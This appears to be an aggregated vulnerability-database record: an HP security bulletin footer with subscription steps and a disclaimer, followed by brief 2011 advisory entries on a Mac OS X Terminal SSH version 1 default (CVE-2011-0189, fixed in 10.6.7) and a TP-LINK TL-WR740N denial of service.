Subscribe: To initiate a subscription to receive future HP Security Bulletins via Email: http://h30046.www3.hp.com/driverAlertProfile.php?regioncode=NA&langcode=USENG&jumpid=in_SC-GEN__driverITRC&topiccode=ITRC
On the web page: ITRC security bulletins and patch sign-up
Under Step1: your ITRC security bulletins and patches - check ALL categories for which alerts are required and continue.
Under Step2: your ITRC operating systems - verify your operating system selections are checked and save.
To update an existing subscription: http://h30046.www3.hp.com/subSignIn.php
Log in on the web page: Subscriber's choice for Business: sign-in.
On the web page: Subscriber's Choice: your profile summary - use Edit Profile to update appropriate sections.
To review previously published Security Bulletins visit: http://www.itrc.hp.com/service/cki/secBullArchive.do
* The Software Product Category that this Security Bulletin relates to is represented by the 5th and 6th characters of the Bulletin number in the title:
GN = HP General SW
MA = HP Management Agents
MI = Misc. 3rd Party SW
MP = HP MPE/iX
NS = HP NonStop Servers
OV = HP OpenVMS
PI = HP Printing & Imaging
ST = HP Storage SW
TL = HP Trusted Linux
TU = HP Tru64 UNIX
UX = HP-UX
VV = HP VirtualVault
System management and security procedures must be reviewed frequently to maintain system integrity. HP is continually reviewing and enhancing the security features of software products to provide customers with current secure solutions.
"HP is broadly distributing this Security Bulletin in order to bring to the attention of users of the affected HP products the important security information contained in this Bulletin. HP recommends that all users determine the applicability of this information to their individual situations and take appropriate action. HP does not warrant that this information is necessarily accurate or complete for all user situations and, consequently, HP will not be responsible for any damages resulting from user's use or disregard of the information provided in this Bulletin. To the extent permitted by law, HP disclaims all warranties, either express or implied, including the warranties of merchantability and fitness for a particular purpose, title and non-infringement." Copyright 2011 Hewlett-Packard Development Company, L.P. Hewlett-Packard Company shall not be liable for technical or editorial errors or omissions contained herein. The information provided is provided "as is" without warranty of any kind. To the extent permitted by law, neither HP or its affiliates, subcontractors or suppliers will be liable for incidental,special or consequential damages including downtime cost; lost profits;damages relating to the procurement of substitute products or services; or damages for loss of data, or software restoration. The information in this document is subject to change without notice. Hewlett-Packard Company and the names of Hewlett-Packard products referenced herein are trademarks of Hewlett-Packard Company in the United States and other countries. Other product and company names mentioned herein may be trademarks of their respective owners. -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.10 (GNU/Linux) iEYEARECAAYFAk2Hc7gACgkQ4B86/C0qfVmbswCgxy1tw165EpDQohbsigBboD52 60QAoN86XN6RKoIdtGzCCx64rePwzmNc =dgb3 -----END PGP SIGNATURE-----
VAR-201103-0288 CVE-2011-0189 Apple Mac OS X default Terminal SSH configuration vulnerability allowing server impersonation
CVSS V2: 5.0
CVSS V3: -
Severity: MEDIUM
The default configuration of Terminal in Apple Mac OS X 10.6 before 10.6.7 uses SSH protocol version 1 within the New Remote Connection dialog, which might make it easier for man-in-the-middle attackers to spoof SSH servers by leveraging protocol vulnerabilities. Mac OS X is prone to a remote security vulnerability.

TITLE: Apple Mac OS X Multiple Vulnerabilities
SECUNIA ADVISORY ID: SA43814
VERIFY ADVISORY: http://secunia.com/advisories/43814/
RELEASE DATE: 2011-03-22
DESCRIPTION: Apple has issued a security update for Mac OS X, which fixes multiple vulnerabilities. The Terminal weakness is item 36 of that advisory: SSH version 1 is used as the default protocol version when using ssh via the "New Remote Connection" dialog.
SOLUTION: Update to version 10.6.7 or apply Security Update 2011-001.
PROVIDED AND/OR DISCOVERED BY: The vendor credits 36) Matt Warren, HNW Inc.
ORIGINAL ADVISORY:
Apple: http://support.apple.com/kb/HT4581
iDefense: http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=898
VAR-201103-0385 No CVE TP-LINK TL-WR740N WebConsole and UPnP Denial of Service Vulnerability
CVSS V2: -
CVSS V3: -
Severity: -
The TP-LINK TL-WR740N is a wireless router. The device has an unspecified error when processing requests: an attacker can send a large number of packets to make the WebConsole and UPnP services unstable, causing a denial of service.